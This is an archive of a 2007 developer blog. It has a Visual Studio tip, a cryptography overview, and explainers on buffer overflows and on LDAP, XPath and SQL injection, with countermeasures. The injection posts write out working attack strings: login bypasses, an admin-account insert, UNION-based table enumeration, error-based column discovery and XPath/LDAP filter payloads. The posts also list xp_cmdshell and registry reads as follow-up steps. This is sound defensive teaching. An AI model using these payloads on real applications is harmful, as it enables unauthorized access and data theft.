Gopal's Blog: 2007

Tuesday, December 11, 2007

Customize your Find in Files Results in Visual Studio

Customize your Find in Files Results in Visual Studio :

The default find in files results window of Visual Studio provides you only File name and line number with in the braces along with the code text. You can customize these results to show what you want to see and how you want to see it. If you spend a lot of your time in reformatting these results for any purpose then this tip might be helpful for you in doing so.

To display Find in files results view in a different format you need to add a registry setting under:
HKEY_CURRENT-USER\Software\Microsoft\VisualStudio\8.0\Find.
Following registry setting will display Find in files results in the below format:
Directory: {Name of the directory}
File Name: {Name of the file}
Line#: {Line number}
Code: {Code snippet}

Go to HKEY_CURRENT-USER\Software\Microsoft\VisualStudio\8.0\Find
Add a new string value called Find result format with a value of Directory : $d\nFile Name : $f$e\nLine #: $l\nCode:$t\r\n where

$d is directory name
$f is the filename
$e is the extension
$l is the line
$t is the text on the line

Note: You don’t have to restart Visual Studio to pick up on your registry changes.

Example Results after the above Registry setting:

Find all "[assembly: AssemblyCulture("")]", Whole word, Subfolders, Find Results 1, "c:\poroj\Source Code\PList", "*.*"
Directory : c:\poroj \Source Code \PList\Business Logic\
File name : AssemblyInfo.cs
Line #: 15
Code:[assembly: AssemblyCulture("")]
Directory : c:\poroj \Source Code \PList\Business Logic\Properties\
File name : AssemblyInfo.cs
Line #: 15
Code:[assembly: AssemblyCulture("")]

Even you can erase or modify the previously typed in search strings in the "Look in" combo on the "Find in Files" search toolbar. This can be done by modifying or erasing previously typed in search string values at HKEY_CURRENT-USER\Software\Microsoft\VisualStudio\8.0\Find, this cannot be possible through the Visual Studio UI.

Full list of items you can specify in the registry:
Files		Location		Text		Char
$p	Path	$l	line	$0	Matched text	\n	New line
$f	File name	$c	Col	$t	Text of first line	\s	Space
$v	Drive/Unc name	$x	end column if on first line, else end of first line	$s	Summary of hit	\t	Tab
$d	Directory name	$L	span end line	$T	Text of spanned lines	\\	Slash
$n	Name	$C	span end column	\$	$
$e	File extension

Thursday, November 1, 2007

An Overview of Cryptography

Cryptography:

There are many aspects to security and many applications, ranging from secure commerce and payments to private communications and protecting passwords. One essential aspect for secure communications is that of cryptography.

Cryptography is the study of mathematical techniques related to aspects of information security such as confidentiality, data integrity, authentication, and non-repudiation. In simple terms, cryptography is the practice and study of hiding information; it is the science of writing information in secret code and is an ancient art. Cryptography is necessary while transmitting secrets, personally identifiable information, when communicating over any untrusted medium includes just about any network, particularly the Internet. While modern cryptography is growing increasingly diverse, cryptography is fundamentally based on problems that are difficult to solve. A problem may be difficult because its solution requires some secret knowledge, such as decrypting an encrypted message or signing some digital document, or the problem may be hard because it is intrinsically difficult to complete, such as finding a message which produces a given hash value.

Fundamental goal of cryptography is to adequately address the following four areas:

Privacy/Confidentiality:
Providing secrecy is one of the goals of cryptography. It means, keeping the content of information from all but those authorized to have it. Simply, it is a process of ensuring that no one can read the message or information except the intended receiver.
Data Integrity:
Assuring the receiver that the received message has not been altered in any way either intentionally or otherwise from the original; addresses the unauthorized alteration of data.
Authentication:
The process of proving one's identity. This applies to both entities and information itself. So, this aspect of cryptography is usually subdivided into two major classes: entity authentication and data origin authentication.
Non-repudiation:
It is a mechanism to prove that the sender really sent this message. It prevents an entity from denying previous commitments or actions performed.

Types of Cryptographic Algorithms:

There are several ways of classifying cryptographic algorithms. Mostly these can be classified into three types as follows based on the number of keys that are employed for encryption and decryption, and further defined by their application and use.

Secret Key Cryptography (SKC) / Symmetric Encryption:
It uses a single secret key for both encryption and decryption.
Public Key Cryptography (PKC) / Asymmetric Encryption:
It uses one key for encryption and another for decryption (public and private key pair).
Hash Functions / One-way Cryptography:
It uses a mathematical transformation to irreversibly "encrypt" information.

Secret Key Cryptography (SKC) / Symmetric Encryption:

In secret key cryptography / Symmetric cryptography, a single secret key is used for both encryption and decryption. As the same secret key is used for both encryption and decryption this key must be shared by both sender and receiver. So, this key must be distributed using a secure medium, and both parties need to secure the key. The biggest difficulty with this approach, of course, is to find an efficient method to agree upon and exchange keys securely. This problem is referred to as the key distribution problem. The difficulty of establishing a secret key between two communicating parties, when a secure channel doesn't already exist between them is a considerable practical obstacle for cryptography users in the real world.

Secret key cryptography schemes are generally categorized into two categories as follows:
Stream ciphers:
Stream ciphers operate on a single bit or byte at a time, and in which the transformation of successive bits or bytes varies during the encryption by implementing some form of feedback mechanism so that the key is constantly changing, the encryption transformation can change for each symbol of plaintext being encrypted. In situations where transmission errors are highly probable, stream ciphers are advantageous because they have no error propagation. If, however, a digit is corrupted in transmission, rather than added or lost, only a single digit in the plaintext is affected and the error does not propagate to other parts of the message. A stream cipher applies simple encryption transformations according to the key stream being used. The key stream could be generated at random, or by an algorithm which generates the key stream from an initial small key stream / seed, or from a seed and previous cipher text symbols. Such an algorithm is called a key stream generator.
Stream ciphers come in several flavors but two are worth mentioning: Self-synchronizing stream ciphers and Synchronous stream ciphers.
Block ciphers:
A block cipher is an encryption scheme which breaks up the plaintext messages to be transmitted into blocks of a fixed length, and encrypts one block at a time. When encrypting, a block cipher might take a fixed-bit block of plaintext as input, and output a corresponding fixed-bit block of cipher text.
Some of the symmetric key block ciphers are as follows, in which Triple DES, AES are preferred:

DES (Data Encryption Standard): DES was designed by IBM in the 1970s. It is a cipher selected as an official Federal Information Processing Standard (FIPS) for the United States in 1976, and which has subsequently enjoyed widespread use internationally. DES is a block-cipher employing a 56-bit key that operates on 64-bit blocks. DES has a complex set of rules and transformations that were designed specifically to yield fast hardware implementations and slow software implementations. In 1998, there was a brute force attack that demonstrated that DES could be attacked very practically, and highlighted the need for a replacement algorithm.
3DES (Triple Data Encryption Standard): When it was found that a 56-bit key of DES is not enough to guard against brute force attacks, TDES was chosen as a simple way to enlarge the key space without a need to switch to a new algorithm. It is a variant of DES that employs up to three 56-bit keys and makes three encryption/decryption passes over the block. Simply, DES(k3;DES(k2;DES(k1;M))), where M is the message block to be encrypted and k1, k2, and k3 are DES keys. TDES with three different keys has a key length of 168 bits: three 56-bit DES keys, with parity bits it has the total storage length of 192 bits.
AES (Advanced Encryption Standard): Generally Rijndael is known as AES, Rijndael is a block cipher designed by Belgian cryptographers Joan Daemen and Vincent Rijmen. AES is not precisely Rijndael as Rijndael supports a larger range of block and key sizes; AES has a fixed block size of 128 bits and a key size of 128, 192 or 256 bits, whereas Rijndael can be specified with key and block sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits. It is adopted as an encryption standard by the U.S. government. It has been analyzed extensively and is now used widely worldwide. The algorithm can use a variable block length and key length; the latest specification allowed any combination of keys lengths of 128, 192, or 256 bits and blocks of length 128, 192, or 256 bits.
IDEA (International Data Encryption Algorithm): In 1992, a secret key cryptosystem is written by Xuejia Lai and James Massey; with a 64-bit block length using a 128-bit key.
Blow Fish: It is a symmetric 64-bit block cipher invented by Bruce Schneier; optimized for 32-bit processors with large data caches, it is significantly faster than DES on a highly configured machines. Key lengths can vary from 32 to 448 bits in length. Blowfish, available freely and intended as a substitute for DES or IDEA.
Rivest Ciphers / Ron’s Code (RC1, RC2, RC3, RC4, RC5, and RC6): In Rivest ciphers, up to RC4 algorithm are found to be breakable. RC5 is a block-cipher supporting a variety of block sizes, key sizes, and number of encryption passes over the data, while using RC5 it is recommended to use larger key sizes and larger number of passes like eighteen to twenty passes, and RC6 is a block-cipher that is an improvement over RC5, RC6 was one of the AES Round 2 algorithms.

Public Key Cryptography (PKC) / Asymmetric Encryption:

Public Key Cryptography was first described publicly by Stanford University professor Martin Hellman and graduate student Whitfield Diffie in 1976. Public Key Cryptography involves a key pair; a key pair consists of two keys that are mathematically related designated as public and private keys, in which two parties could engage in a secure communication over a non-secure communications channel without having to share a secret key. Although knowledge of one key does not allow someone to easily determine the other key. This makes it possible for sender and receiver to simply send their public keys to one another, even if the channel they are using to do so is insecure. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext.
In simple words, if the public key is used to encrypt some data, then it can be decrypted only using the corresponding private key. And similarly, if the private key is used to encrypt some data, then it can be decrypted only using the corresponding public key. This encryption mechanism can also be called as asymmetric encryption.

Compared with symmetric-key encryption, public-key encryption requires more computation and is therefore very slow. So, this technique is not appropriate for large amounts of data. Commonly, this PKC is used to transmit the secret keys between the parties and thereafter parties use these transmitted keys to encrypt their further communications. A central problem for public key cryptography is proving that a public key is authentic and not tampered by a malicious third party or an attacker. The usual approach to this problem is to certify ownership of key pairs by third parties known as certificate authorities.

Some of the asymmetric key block ciphers are as follows:
RSA(Rivest, Shamir, Adleman Algorithm): Ronald Rivest, Adi Shamir, and Leonard Adleman are developed this algorithm, hence called as RSA. It uses a variable size encryption block and a variable size key. Unlike few other algorithms, RSA can be used for key exchange, digital signatures, and the encryption of small blocks of data. RSA is a cipher based on the concept of a trapdoor function. This is a function which is easily calculated, but whose inverse is extremely difficult to calculate. RSA's mathematical hardness comes from the ease in calculating large numbers and the difficulty in finding the prime factors of those large numbers.
Diffie-Hellman: The Diffie-Hellman algorithm was developed by Diffie and Hellman in 1976 and published in the "New Directions in Cryptography” paper. The protocol allows two users to exchange a secret key over an insecure medium without any prior secrets. This key can then be used to encrypt subsequent communications using a symmetric key cipher. This algorithm works based on the multiplicative group of integers modulo p, where p is prime and g is primitive root mod p, these are system parameters. For example:

Like A and B are openly shared; these are the private and public keys, respectively. Based on their own private key and the public key learned from the other party, Alice and Bob have computed their secret keys. This derived key later used as an encryption key for further communication.
Digital Signature Algorithm (DSA): The algorithm specified in NIST's Digital Signature Standard (DSS), provides digital signature capability for the authentication of messages. As the DSA authenticates both the identity of the signer and the integrity of the signed information, it can be used in a variety of applications like mail, electronic funds transfer applications, etc.
Elliptic Curve Cryptography (ECC): A PKC algorithm based upon elliptic curves, it was designed for devices with limited compute power and/or memory, such as smartcards and PDAs. In 1985, ECC was proposed by cryptographers Victor Miller (IBM) and Neal Koblitz (University of Washington). It is based on the difficulty of solving the Elliptic Curve Discrete Logarithm Problem. Given two points, P and Q, on an elliptic curve, find the integer n, if it exists, such that P = nQ. ECC can offer levels of security with small keys comparable to RSA and other PKC methods.

Hash Functions / One-way Cryptography:

The essential cryptographic properties of a hash function are that it is both one-way and collision-free. It uses a mathematical transformation to irreversibly "encrypt" information. Hashing is the transformation of a string of characters into a usually shorter fixed-length value which is called the hash value that represents the original string. The hashing algorithm is called the hash function. In addition to faster data retrieval, hashing is also used to encrypt and decrypt digital signatures.
The most basic attack we might mount on a hash function is to choose inputs to the hash function at random until either we find some input that will give us the target output value we are looking for (thereby contradicting the one-way property), or we find two inputs that produce the same output (thereby contradicting the collision-free property). A good hash function should not produce the same hash value from two different inputs. If it does, this is known as a collision. A hash function that offers an extremely low risk of collision may be considered acceptable. To avoid an attack that depends on brute-force methods, the output from the hash function must be sufficiently long.

Some of the Hash functions are as follows:
Message Digest (MD) algorithms: A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.

MD2: It was developed by Rivest in 1989. The message or data is first padded so that its length in bytes is divisible by 16. A 16-byte checksum is then appended to the message or data, and the hash value is computed on this resulting message. It creates 128-bit hash value from data input of any length. It is optimized for 8-bit machines. The collisions for MD2 can be constructed if the calculation of the checksum is omitted. This is the only cryptanalytic result known for MD2. It is designed for systems with limited memory, such as smart cards.
MD4: It was developed by Rivest in 1990. The message is padded to ensure that its length in bits plus 448 is divisible 512. A 64-bit binary representation of the original length of the message is then concatenated to the message. The message is processed in 512-bit blocks in the Damgård/Merkle iterative structure, and each block is processed in three distinct rounds. It is designed specifically for fast processing in software. It is optimized for 32-bit machines. MD4 should now be considered broken.
MD5: It was developed by Rivest in 1991. It is basically MD4 with "safety-belts" and while it is slightly slower than MD4, it is more secure. The algorithm consists of four distinct rounds, which have a slightly different design from that of MD4. Message-digest size, as well as padding requirements, remains the same. MD5 is developed after potential weaknesses were reported in MD4, it is also optimized for 32-bit machines. Den Boer and Bosselaers have found pseudo-collisions for MD5, but there are no other known cryptanalytic results.

Secure Hash Algorithm (SHA): The Secure Hash Algorithm specified in the Secure Hash Standard (SHS), was developed by NIST (National Institute of Standards and Technology, a division of the U.S. Department of Commerce; it was formerly known as the National Bureau of Standards (NBS)) and published as a federal information processing standard. SHA-1 was a revision to SHA that was published in 1994. The revision corrected an unpublished flaw in SHA. Its design is very similar to the MD4 family of hash functions developed by Rivest. It takes a message of less than 2 to the power of 64 bits in length and produces a 160-bit message digest. The algorithm is slightly slower than MD5, but the larger message digest makes it more secure against brute-force collision and inversion attacks.
Whirlpool: It is designed by Vincent Rijmen and Paulo S. L. M. Barreto that operates on messages less than 2 to the power of 256 bits in length, and produces a message digest of 512 bits. Historically, WHIRLPOOL had three versions. The first version is WHIRLPOOL-0, its successor WHIRLPOOL-T, and WHIRLPOOL. Whirlpool was adopted by the International Organization for Standardization (ISO) in the ISO/IEC 10118-3:2004 standard.

References:

http://www.garykessler.net/library/crypto.html
http://www.x5.net/faqs/crypto/
http://en.wikipedia.org/wiki/Main_Page

Saturday, October 20, 2007

An Overview Of Buffer Overflows / Buffer Overruns

Buffer Overflows (Buffer Overrun):

A buffer overrun condition occurs when a process tries to copy more data into a buffer than the buffer intended to hold. Buffer overruns can occur on the stack memory or on the heap memory. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions that could, damage the user's files, corrupt or overwrite the valid data, or disclose confidential information.

Buffer overflows are not easy to discover and even when one is discovered, it is generally extremely difficult to exploit. Buffer overflows found in widely used server products are likely to become widely known and can pose a significant risk to users of these products. It is very hard to discover these flaws in custom code of the application and risk is significantly moderate as the source code and detailed error messages for the application are normally not available to the attacker to perform further exploits other than to crash the application.

Attackers use buffer overflows to corrupt the execution stack of a web application. By sending specifically crafted input to a web application, an attacker can cause the web application to execute arbitrary code of their choice. With this attack an attacker can perform the following actions but not limited to:

Creating an unauthorized user or administrator accounts
Creating unprotected entry points into a system (“back-doors”)
Disabling protective devices such as firewalls or antivirus solutions
Running arbitrary code instead of legitimate code

Background:

In a classic buffer overflow exploit, the attacker sends data to a program that having this vulnerability, which it stores in undersized stack overwriting information on the call stack, including the function's return pointer. The attacker data sets the value of the return pointer in such a way that points back to the buffer that holds arbitrary code of the attacker, so that when the function returns, it transfers control to malicious code contained in the attacker's data. There are a variety of other types of buffer overflow, including Heap buffer overflow and Off-by-one Error among others. Another very similar class of flaws is known as Format string attack. All these conditions occur due to code not checking to see if the buffer being copied into has been allocated enough space for data being copied.

The application or component uses an unmanaged language, native code or some language that is not deemed “memory safe” for implementation is vulnerable to buffer overflows when user input is blindly copied into buffer structures without being validated first for length and type, opportunities. Managed languages such as C# and Java are generally not susceptible to buffer overrun conditions. Managed code makes buffer overruns extremely difficult to encounter however not impossible. For example, managed code can call into unmanaged code and overruns can occur there.

In Detail:

A buffer is a contiguous allocated chunk of memory. In many unmanaged languages, there are no automatic bounds checking on the buffer, which means a user can write past a buffer. Like, see the following example:

int main()
{
int stackbuff[20];
stackbuff[25] = 5;
}

The above program is a valid and doesn’t produce any errors. In the above the program writes data beyond the allocated memory for the buffer, you are allocated only 20 blocks of memory to the variable “stackbuff” of type integer but writing the value of 5 at 25th block that is beyond the allocation, which might result in unexpected behavior.

How the attacker exploits buffer overflows?

A Stack is a contiguous chunk of memory and a register called the stack pointer (SP) points to the top of the stack, the bottom of the stack is at a fixed address. Its size is dynamically adjusted at runtime. Whenever a function call is made, the following are pushed on to the stack in the specified sequence. First the function parameters, then the address to be executed after the function returns, then a frame pointer (FP), followed by local variables of the function. All these variables are cleaned up from the stack as the function terminates.

For example, see the following example code:

int sumofvalues(int x, int y, int z)
{
int sum=0;
sum = x+y+z;
return sum;
}

Whenever the above function is executed the stack will be like below:

First three function parameters x, y, z will be pushed onto the stack, then return address, then frame pointer, followed by local variable sum.

Suppose, your application is having a function looks like below:

void funccpy(char *source)
{
char destination[20];
strcpy(destination, source);
}

Later, this function is get called by passing string of characters that are to be copied into another string, well works fine if the passed characters are having length less than 20 characters. But, what happens if the passed value is having more number of characters than 20? The extra bytes run past the buffer allocated for “destination” variable causing overwrites the space allocated for the FP, return address and so on. Using this vulnerability an attacker can easily execute code of his choice by overwriting the return address. For example, attacker is able to place the arbitrary code to execute in the buffer's overflowing area and then overwrite the return address in such a way it points back to the buffer and executes the intended code. Such arbitrary code can be inserted into the program by using input parameters.

Recommendations/ Counter measures:

For each instance where user input is copied or concatenated into a buffer, perform input validation on the input for size prior to the buffer copy. If the user input exceeds the allocated space of the destination buffer, do not perform the copy and return with an error.
Source code and binaries should be scanned with source code analysis and binary analysis tools respectively to detect common buffer overrun conditions.
The choice of programming language can have a great effect on the occurrence of buffer overflows. Many programming languages provide runtime bounds checking which might send a warning or raise an exception when it would overwrite data.
Try to avoid usage of unmanaged code, if necessary, consider usage of secure functions instead of unsecure functions like strcpy(), strcat(), ...
Keep systems with most up to date security patches.

Wednesday, October 17, 2007

One Of The Code Injection Attack: LDAP Injection

LDAP Injection:

LDAP Injection is an attack technique used to exploit web sites that construct LDAP statements from invalidated user supplied input. Using this attack, the attacker can execute arbitrary statements against the directory services. Simply, LDAP injection attack exploits vulnerabilities in input validation to run arbitrary LDAP statements against information directories. LDAP Injection is possible when an application constructs dynamic LDAP statements by using invalidated/un-sanitized user input to access directory services.

What Is LDAP?

Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating directory services running over TCP/IP. LDAP was designed at the University of Michigan to adapt a complex enterprise directory system (called X.500) to the modern Internet. Just like any Database Management System is used to process queries and updates to a relational database, an LDAP server is used to process queries and updates to an LDAP information directory. LDAP session starts whenever a client connects to an LDAP server. After establishing a connection with the LDAP server the client sends operation requests to the server, and the server sends responses in turn. The server may send the responses in any order and with few exceptions the client need not wait for a response before sending the next request. The LDAP protocol is both cross-platform and standards-based and LDAP directory servers store their data hierarchically, LDAP directories are heavily optimized for read performance. LDAP allows you to securely delegate read and modification authority based on your specific needs using Access Control Instances(ACIs).

In Detail:

LDAP Injection attacks are not as common as the other types of injection attacks like SQL Injection. But, an LDAP Injection could occur anywhere that the underlying code could use some type of invalidated user input for any LDAP searches, or queries.

The most widely use of LDAP in web applications is to enable users to easily search for specific data on the Internet. For Example, LDAP-enabled Web application searches specific information about a user by accepting the user name from the user and uses it in a search query. The underlying code would take this search query information and generate the LDAP query dynamically that will be used to search the LDAP database. The search query within the code may like below:

String uName = txtSearch.Text
String searchQuery = "(cn=" + CStr(uName) + ")"
ldapObj.DN = "ou=customers,dc=example,dc=com"
ldapObj.SearchFilter = searchQuery

If the variable uName is not properly validated, an LDAP injection could be possible. Suppose an attacker can use this vulnerability in any one of the following ways, but not limited to:

If an attacker enters * as an input, then the resulting LDAP statement will make the server return any object that contains a “cn” attribute, simply this will return every username in the LDAP database.
If an attacker enters the input as xxx)((acno=*), this results the underlying LDAP search query like (cn=xxx)((acno=*) ) which would reveal the users xxx account number.

There are so many other possibilities that an attacker can perform depending on the way the LDAP query constructed and the resulting actions by that query. An attacker can start the attack by sending a few requests with unusual characters to know how the application reacts to them and to identify the type of validation performed within the code of the target application. Later the attacker continues his attack by reverse-engineering the structure of the LDAP query to determine how the user-supplied data is used to perform the search. Few applications use LDAP queries to authenticate users, in such a case the authentication mechanism can be easily bypassed.

Countermeasures / Preventions:

LDAP Injection can be prevented in the same way as other code injection attacks since LDAP injection attack is one of the code injection attacks.
Input Validation: It is the best measure to defend applications from LDAP injection attacks. The underlying code needs to verify the correct input using a white list to ensure that the application does accept only legitimate input. If the input is verified against a white list using a regular expression then the malicious input could be rejected.
Also, all data returned to the user should be validated and the amount of data returned by the queries should be restricted as an added layer of security.
Please refer to my previous posting on Input Validation for more details.
LDAP Server Configuration: Implementing tight access control on the data in the LDAP directory is vital when configuring the permissions on user objects. The access level used by the Web application to connect to the LDAP server should be restricted to the minimum required. In addition, the LDAP server should not be directly exposed on the Internet, thereby reducing the attack surface area.

Wednesday, October 10, 2007

Code Injection: XPath Injection

XPath Injection:

SQL is the most popular type of code injection attack, there are several others that can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An ‘XPath injection’ attack is similar to an SQL injection attack, but its target is an XML document rather than an SQL database. ‘XPath Injection’ is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

What is XML?

XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data. In XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.

What is XPath?

“XML Path” or “XPath” 1.0 is a language used to refer to parts of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. It can be used directly to query an XML document by an application, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document. Please refer to XPath Tutorial for more details on XPath.

In Detail:

Code Injection is a technique to Inject code into a program or application code by taking advantage of the unchecked assumptions the application makes about its inputs to bypass or modify the originally intended functionality of the code. All code injection attacks work in a same way; an attacker injects malicious code into the application code through an input field of the application. So, to perform such attacks there must be entry points that are not performing adequate validation.
Consider a Web application that uses XPath to query an XML document to retrieve the social security number of a customer by passing name and password values that are supplied by the user of the application. If the application embeds these values directly in the XPath query then it is vulnerable to XPath Injection.

For Example:

An application is using “CustProfile.xml” to store the customer related data and is like below:

<? xml version = " 1.0" encoding =" utf-8" ?>
<Customers>
<Customer>
<CLogIn> Malapati </CLogIn>
<CName> Pradeep Malapati </CName>
<Email> pradeep.malapati@malapaticorp.com </Email>
<Pwd> Malapati2020 </Pwd>
<SSN> xxxxxxxxxxxx </SSN>
<ACNO> 11111111111 </ACNO>
</Customer>

<Customer>
<CLogIn> Vijaya </CLogIn>
<CName> Vijaya Gavuji </CName>
<Email> Vijaya.Gavuji@vigavinc.com </Email>
<Pwd> Vigav1010 </Pwd>
<SSN> xxxxxxxxxxxx </SSN>
<ACNO> 99999999999 </ACNO>
</Customer>
--------
--------
</Customers>

In application, the code is written like below to retrieve Social Security Number of the customer:

XmlDocument XmlDoc = new XmlDocument();
XmlDoc.Load("CustProfile.xml");
...
XPathNavigator custnav = XmlDoc.CreateNavigator();
XPathExpression xexpr = custnav.Compile("string(//Customers/Customer[CLogIn/text()='"+TextBox1.Text+ "' and Pwd/text()='"+TextBox2.Text+ "']/SSN/text())");
String ssn=Convert.ToString(custnav.Evaluate(xexpr));
if (!ssn=="")
{
// some logic using ssn or return ssn
}
else
{
// return with error message
}

In the above sample code application is allowing its users to retrieve and perform operations on SSN based on the invalidated values supplied by them. Now, this code is vulnerable to XPath Injection! If user enters legitimate values like Malapati and Malapati2020 in Login and password fields respectively then the Query will be looks like below:

// Customers/Customer[CLogIn/text()='Malapati’ and Pwd/text()= 'Malapati2020']/SSN/text()

Works well. But, suppose a user/ attacker enters the following value in the text box provided for customer Login and a blank value in password field.
' Or 1=1 Or 'a'='a

Now, what will be the actual XPath query?

// Customers/Customer[CLogIn/text()=' ' Or 1=1 Or ‘a’ = ‘a’ and Pwd/text()=' ']/SSN/text()

The above expression CLogIn/text() = ‘ ’ Or 1=1 Or ‘a’ = ‘a’ and Pwd/text() = ‘ ’ can be simply represented as below:
(CLogIn/text() = ‘ ’ Or 1=1) Or (‘a’ = ‘a’ and Pwd/text() = ‘ ’) as logical operator AND has higher precedence than OR. So if either first or second condition is true the expression will evaluate to true. In this case the attacker input is having 1=1 is always returns true thus making first condition always becomes true. Now the above query is identical to //Customers/Customer/SSN/text() that results first record’s/node SSN number.

Countermeasures / Preventions:

XPATH Injection can be prevented in the same way as SQL injection since XPath injection attacks are much like SQL injection attacks. Most of these preventative methods are the same as well to prevent other typical code injection attacks.
Input Validation: is one of the best measures to defend applications from XPATH injection attacks. The developer has to ensure that the application does accept only legitimate input. Please refer to my previous posting on Input Validation for more details.
Parameterization: Use parameterized queries to prevent XPATH injection. In Parameterized queries, the queries are precompiled and instead of passing user input as expressions, parameters are passed. For example:
//Customers/Customer[CLogIn/text() = $login and Pwd/text() = $password]/SSN/text()

Please refer to the Mitigating XPath Injection Attacks in .NET for more details.

Friday, September 21, 2007

An Over View Of SQL Inection

SQL Injection:

A SQL injection attack exploits vulnerabilities in input validation to run arbitrary commands in the database. Your code is vulnerable to SQL injection attacks wherever it uses input parameters to construct SQL statements. A SQL injection attack occurs when un-trusted input / user controllable input can modify the logic of a SQL query in unexpected ways. It can also occur if your code uses stored procedures that are passed strings that contain unfiltered/un-sanitized user input.

Impact:

SQL injections can result in unauthorized access, modification, or destruction of SQL data. Using the SQL injection attack, the attacker can execute arbitrary commands in the database. If an application is vulnerable to SQL injection and application uses an over-privileged account to connect to the database then it is possible to run operating system commands using database server and can potentially compromise other severs, in addition to being able to retrieve, manipulate, and destroy data exist in the databases.

Background:

Generally web applications allow legitimate users to submit and retrieve data to/from a database over the Internet using their browser/interface. This data may be anything user information, company statistics, product details, customer details, vendor details, payment information, financial information etc. These applications are vulnerable to SQL Injection if user controllable input is directly used in building the SQL statements without adequate validation to interact with the backend.

In Detail with few examples:

The simplest SQL injection technique is bypassing login forms. See the following web application code used in login form:

Query = "SELECT Uname FROM Users WHERE Uname = ‘" & txtUsername & "‘ AND Pwd = ‘" & txtPassword & "‘"

strCheck = GetDbaseResult(Query)
If (strCheck = "")
boolAuthenticated = False
else
boolAuthenticated = True

By the above logic the GetDbaseResult method will go through the Users table and will return the user name if there is a row exists with the username and password supplied by the user. This username is stored in the variable strCheck. If there is no row that the user supplied data exists in users table, strCheck will be empty and the user will not be authenticated.
In the above code you are constructing SQL statement dynamically using user input (Text box values of login form) without adequate validation or sanitization. This is vulnerable for SQL injection and this authentication logic can be easily bypassed by an attacker in following way.

Enters ‘ OR ‘‘=‘ in text box provided for user name and ‘ OR ‘‘=‘ in text box provided for password.

Now the final query that is going to be executed will be like below:

SELECT Uname FROM Users WHERE Uname = ‘‘ OR ‘‘=‘‘ AND Pwd = ‘‘ OR ‘‘=‘‘

The above statement is always returns true! Since all of the qualifying conditions in the WHERE clause are now met, this will return the username from the first row in the table that is searched. It will pass this username to strCheck, which will ensure our validation. Oops our authentication mechanism is bypassed!

Or just enter ‘ OR ‘a’ = ‘a’;-- in the text box provided for user name in login form to bypass authentication.
Or can create a login for himself by insering a row into the Users table with following statement.

'; insert into users values('Attacker', 'Password', ‘Admin’ )--

Direct Injection vulnerabilities:

In a direct injection, whatever argument you submit will be used in the SQL query without any modification. Direct values can be either numeric value used in WHERE statements, such as fallows…

Query = "SELECT CustNo, CustName, Location FROM Customers WHERE CustNo = " & txtCustNumber

…or the argument of an SQL keyword, such as table or column name:

Query = "SELECT CustNo, CustName, Location FROM Customers ORDER BY " & txtColumnName

Quoted Injection vulnerabilities:

In a quoted injection, whatever argument user submits has a quote prefixed and appended to it by the application, such as fallows...

Query = "SELECT CustNo, CustName, Location FROM Customers WHERE CustName = = ‘" & txtCustName & "‘"

In case of Quoted injection vulnerability attacker must use injection string that contains a single quote before an SQL keyword. Attacker can also use special symbols like “;--“ to comment out the rest of the logic. Everything after this “--“ will be treated as comments in SQL server, attacker uses appropriate symbols depending on the backend used for the application. Attacker can know these details by reverse-engineering several parts of the vulnerable web application’s SQL query from the returned error messages.

There are many ways to inject SQL code to get unintended results from the application. For Example attacker simply modifies a WHERE clause by injecting a UNION SELECT, to make the database server return records other than those intended. This allows multiple SELECT queries to be specified in one statement.

SELECT CustNo, CustName FROM Customers WHERE CustNo = -1 UNION ALL SELECT ProdCode, ProductName, Price FROM Products WHERE 1 = 1

The above statement will return the recordsets from the first query and the second query together. In the above the key word ALL is used to escape certain kinds of SELECT DISTINCT statements.
In the above the actual query within the code is like below:

Query = “SELECT CustNo, CustName FROM Customers WHERE CustNo = “ &txtCustNo

Simply attacker injected the following code to get the details of products:

1 UNION ALL SELECT ProdCode, ProductName, Price FROM Products WHERE 1 = 1

The above constructed query will not return any records from the first table since it won’t find a record with the customer number negative one(assuming that there will be no negative customer numbers), but will return all records from the second table which is injected into the actual query.
Most SQL compliant databases, including SQL Server, store metadata in a series of system tables with the names sysobjects, syscolumns, sysindexes, and so on. This means that an attacker could use these system tables to grab schema information for a database to assist him in the further compromise of the database. For example the following code might be used to reveal the names of the user tables in the database:

' UNION SELECT id, name, '', 0 FROM sysobjects WHERE xtype ='U' --

How attacker gathers information:

In order to manipulate the data in the database, the attacker will have to determine the structure of certain databases and tables. Well, how attacker will get this information?
If detailed error messages are returned from the application, the attacker can determine the entire structure of the database, and read any value that can be read by the account the application is using to connect to the Database Server.
Suppose the attacker wants to establish the names of the tables that the query operates on, and the names of the fields. For this, he uses the 'having' clause of the 'select' statement by injecting code into the select statement by entering malformed code into the text box or query string like below:

' having ‘a’= ‘a’-- Or
‘ having 1=1 --

The above statement returns an error saying Column 'XXXXXX' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. So now the attacker knows the first column name in the query. He can continue through the columns by introducing each field into a 'group by' clause, like below:

' group by XXXXX having 1=1-- (Here XXXXX is column name retrived in error message)

The above statement then throws an error message saying Column 'YYYYY' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Now the attacker knows the second column name of the query and moves on. After knowing all columns he can determine the types of each column by using a 'type conversion' error message, with the help of aggregate functions like below:

' union select sum(XXXX) from TableName --

The above statement reveals data type of the column by returning error message like the sum or average aggregate operation cannot take a varchar data type as an argument, which tells him that the 'XXXX field has type 'varchar'. He can use this technique to approximately determine the type of any column of any table in the database. The attacker can take advantage of any error message that reveals information about the environment, or the database.

What attacker can do further?

Once an attacker has control of the database or compromised the database, he can use that access to obtain further control over the network. He can do anything like below but not limited to:

Using the xp_cmdshell extended stored procedure to run operating system/arbitrary commands on the database server.
Use the 'bulk insert' statement to read any file on the server.
Can use the system stored procedures like sp_OACreate, sp_OAMethod and sp_OAGetProperty to create ActiveX applications.
Using the xp_regread extended stored procedure to read registry keys, including the SAM (if Database Server Service is running as the local system account).
Can create custom extended stored procedures to run exploit code on the database server from within the Database Server process.
Can manipulate/drop the data, can retrieve sensitive information.
